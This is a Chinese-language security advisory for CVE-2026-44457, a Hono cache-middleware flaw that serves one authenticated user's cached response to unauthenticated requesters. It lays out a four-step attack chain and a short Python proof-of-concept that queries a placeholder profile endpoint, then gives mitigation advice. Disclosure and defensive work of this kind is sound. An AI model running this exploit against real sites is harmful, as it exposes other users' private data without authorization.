CVE-2026-44457 CVSS 5.3 中危

CVE-2026-44457 Hono缓存中间件敏感信息泄露漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44457

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Hono

漏洞概述

Hono Web应用框架在4.12.18版本之前存在缓存中间件漏洞。由于未正确跳过声明了Vary: Authorization或Vary: Cookie的响应缓存，导致一个认证用户的响应可能被缓存并服务给后续的不同用户请求，造成敏感信息泄露。该问题已在4.12.18版本中修复。

技术细节

该漏洞源于Hono框架的Cache Middleware对HTTP缓存头的处理逻辑缺陷。在标准HTTP协议中，Vary头用于指示缓存机制在匹配缓存时除了URL外还需考虑哪些请求头字段。当响应包含Vary: Authorization或Vary: Cookie时，意味着响应内容与特定用户的身份状态绑定，不应被无差别地共享。

在受影响版本中，中间件忽略了这些Vary头，将本应隔离的用户专属响应存入了公共缓存。利用该漏洞不需要复杂的攻击手法，攻击者只需在受害者（已认证用户）访问过某一接口后，向同一接口发送未认证请求即可。由于服务器错误地返回了受害者的缓存数据，攻击者可借此获取其他用户的个人信息、订单详情等敏感数据，完全绕过了身份验证检查。

攻击链分析

STEP 1

1. 漏洞识别

攻击者确认目标站点使用Hono框架且启用了Cache Middleware。

STEP 2

2. 缓存污染

攻击者诱导或等待已认证用户（如管理员）访问受保护的特定页面，导致用户的私密响应被服务器错误地缓存。

STEP 3

3. 未认证访问

攻击者向同一URL发送不带任何认证信息（Cookie或Authorization头）的HTTP请求。

STEP 4

4. 数据泄露

服务器由于缓存机制缺陷，直接将步骤2中缓存的受害者数据返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-44457: Hono Cache Middleware Information Leakage
# This script demonstrates how an attacker can retrieve cached data of another user.

target_url = "http://vulnerable-hono-app.com/api/profile"

def exploit():
    # Step 1: Simulate the scenario where a victim's data is cached.
    # In a real attack, this happens naturally when a victim browses the site.
    # Here we assume the cache is already populated by a previous request from a victim.
    print("[+] Assuming victim data is already cached...")

    # Step 2: Attacker sends a request without authentication headers.
    # The application should return 401 Unauthorized.
    # However, due to the vulnerability, it returns the cached 200 OK from the victim.
    headers = {
        # No Authorization or Cookie headers
        "User-Agent": "Attacker-Scanner/1.0"
    }

    print(f"[*] Sending unauthenticated request to {target_url}")
    response = requests.get(target_url, headers=headers)

    # Step 3: Check if we received the victim's data
    if response.status_code == 200:
        print("[+] Exploit successful! Received cached data:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")

if __name__ == "__main__":
    exploit()

影响范围

Hono < 4.12.18

防御指南

临时缓解措施

在升级版本前，建议立即禁用应用中涉及身份认证和敏感数据接口的Cache Middleware，或者配置反向代理（如Nginx）正确处理Vary头以防止缓存共享。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表